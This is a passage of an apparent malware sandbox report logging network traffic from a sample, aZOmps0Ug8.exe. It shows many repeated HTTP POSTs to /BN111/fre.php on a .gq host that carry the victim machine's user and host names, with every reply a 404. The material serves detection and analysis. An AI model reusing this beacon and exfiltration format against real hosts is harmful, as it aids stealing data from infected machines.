                      Oct 14, 2021 08:29:03.093130112 CEST1139OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:03.214101076 CEST1140INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91AmIffLnKe4Pbncz7KrUdCC7%2FIC1zkuoHQN1JfssoGk24gGXGVgK%2FfjSd%2BRFPNjQzfYkOwMtC%2FXqL%2BrxK2TSNEenBHg5Mzc%2Fbxkf4%2Fw%2FzewmKsOYKbBYCwux31XnGOv3FNqWKnELOMAweMsH1mdlUR0lqprnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0464cd51772-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      33192.168.2.649815172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:06.184636116 CEST1141OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:06.200411081 CEST1141OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:06.302758932 CEST1142INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vcIT0xtrtdVqZu8AstBfvjAOVLZeU0jJkIg51LaEYzt2WcaP0aINNFdyPyzHGCi%2BFUn%2Bt9DitNetNAaC7a2WU1CkIz4esUAOdjvWe6RoWWH3jxFIhJPzOheLtuS4TLQLSt5M8LPLyDNCbhVFlEiI3yXDVeNVew%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec059aa9618e5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      34192.168.2.649816172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:07.530339003 CEST1143OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:07.546461105 CEST1143OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:07.646630049 CEST1144INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AsF%2F42rJeMS4o1jyaWpX5rcN1C7%2BwlYe9QyAvadZhUprUUDjjvl2mBaUHv2qSzvsM16RfVyDjciOwaQ0dYaMDLZXn9BBMNQ78ci9geDbIWxYBOq%2Ff7WlFnJZqgqdZEFqzws6tXcgPBAa0hiRMJyXMKzh%2BY5Kzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0621a7342f1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      35192.168.2.649817104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:08.722565889 CEST1145OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:08.738579988 CEST1145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:08.835047960 CEST1146INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AETlKv0JLdUaJlMFIYw4c%2FUS3KY3jsZfqgBBcqkQPH7kBiRqISjQcPL9%2F6EycOt8Q0b%2BrCiBpVWf2JTuaTeRvPun%2BVdjS3dtjl0255v8MUhEF3A8ouzlFjwM9m5wMuIPxpMuRcbOokOsnygMEGf%2FVwZGMBD6qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0698d3268e5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      36192.168.2.649820104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:09.909565926 CEST1225OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:09.925599098 CEST1225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:10.033361912 CEST1243INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erKQyQL4NJDpVARn6gPTghRshW34aWgx999kFto0hxMgvDWKpjzkg8Ub9PghJyk1Z5TjvoNbgssstoLWvM30lY7gyqwlTQwOwpeLID12mO81PbUOzRbpTH9BULjM1lW%2FOKhQiir%2FSFqgaO1xg4olF%2FOm%2FEl05Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec070fbf74e98-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      37192.168.2.649826172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:11.124121904 CEST1373OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:11.140162945 CEST1377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:11.252242088 CEST1385INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYS21KNhhPKeyLYemwqTO7CJfgOLB%2BcE8nmbaXZezuXpmbCfYbooJZGrTK1I2wCAIGGXi7Mmgbbcm9cTp0SlhyncjZPkn5v4lky0Kk4tKiYowD6Fp1RjLa2jaLWKfS7dODQ0ElVEAkA4Fmys4RO0oXOblnwXng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0788baf7049-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      38192.168.2.649834172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:12.348795891 CEST1557OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:12.364717007 CEST1559OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:12.488634109 CEST1561INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2qI3uPr1SHaFu9HAlyv12q%2Fhc2IMayWd%2Bj1fcV0AkZcaVue84gdm%2F7cQrR6vLY0VY7KYJBbWGLpWPtzrfM9eaBQPFNmCRI7TpAHhLrs47U15LbrrJR0WJX9Oc%2Bk59NVPnfHDIGNV6BI%2BfF99GVheeaXjWvcKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0803a323128-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      39192.168.2.649843172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:13.657084942 CEST1800OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:13.673129082 CEST1801OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:13.770459890 CEST1840INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vLfAG7fmX6CyxJzEk0O%2FBmg16SmrBE5YBS%2BRqup8BBlwc6IKUiq47jBhstgYikzkzMesviFQn6p1zW4GFv1I33WYuGftqKKV0g1GwmVoOI9dfpmoaBmAp7BfaYYlwjL6gInDoblSgql%2F6c1Q%2FtwThQC5OxPEAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec088686f5c38-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.649783172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:23.792481899 CEST1062OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:23.808618069 CEST1062OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:23.945936918 CEST1063INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wgGIaVyqpazjweKVSLXwiCkN75Ifsmvy1yNZb2HaTGFvj97QAK7byh9rdPZijXBS8IE2ZBG%2FYRIB4fcQZc0542rQ1bDIXwKO%2FyT7rfH3BOzsIfhWyfBIdPcSEdN3h0udKSLVpVjCxXslaXSnf%2Bcj8Aw4JtpmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf50b8e24de8-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      40192.168.2.649853172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:15.138021946 CEST2098OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:15.154344082 CEST2099OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:15.258631945 CEST2100INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIoJjlpOUB4ch8A9vB%2FKQqgVGqG%2FBMM%2BfQzehosuEFSNQFo0gE9WIhQc2ZWAsVfi803z79IZC7COD7vw7q3ZvK9f7Lpn0xBwaC95bSAWCuYNsNId8NhJwwCkVxQHYxnxd4FRF8MJkTCEfItWcIZzhdJYp6PXZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec091ad1b4aaa-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      41192.168.2.649860104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:16.658468008 CEST2114OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:16.674575090 CEST2114OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:16.772655964 CEST2116INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6WLQ0YL6zFlWhHgnt6U6cMjNqhg5htzjtx%2FJ7jjaqAcyvmGs5vvqQFzydOJ0caWu3xNVdyUaeMy0GV8mS37gvIqcjdOZZ0esg5rlfOM%2FG%2FhL%2Bsg9F9ZhQbRtpEBXBQq5liRP8vYQAFgvHT%2FvZ5gZZtn75E7xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec09b293e5be5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Oct 14, 2021 08:29:16.772679090 CEST2116INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      42192.168.2.649863104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:18.009855986 CEST2121OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:18.026037931 CEST2121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:18.129460096 CEST2122INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEEHx%2BkmIT9asVndpNXR1AoGjnCHChsMAYShF5yGwYqEj%2FgJsdB0Mx0KbcltXiFP56kkMvROqu%2FHNChiSzQKeS2N34dJxa42lt0RG86mw%2F6702IFnVtlIfN7UOJyiytUwY3ivfQHS555wFEzMe%2FIT1fowiWd1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0a39b634e8b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      43192.168.2.649864104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:20.400475025 CEST2123OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:20.416629076 CEST2123OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:20.518090010 CEST2124INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4smlu4lSWaMUj8PWc%2BGpmke%2BENRvCwicQAhGufEzY4Xwa7kc3y6YhyyyYu%2BwPR0zEsPEe1hN0%2BiA2kWHr%2FJE%2BXajyLuEfTCC38E6%2FySGXkOUU0sGE9B9d2NunzFnN9Jpxmznzq%2BWLqFLCc88Y6o8kCh%2BJdWbng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0b28e524e5c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      44192.168.2.649870172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:21.825018883 CEST2128OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:21.846321106 CEST2128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:21.940284967 CEST2129INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
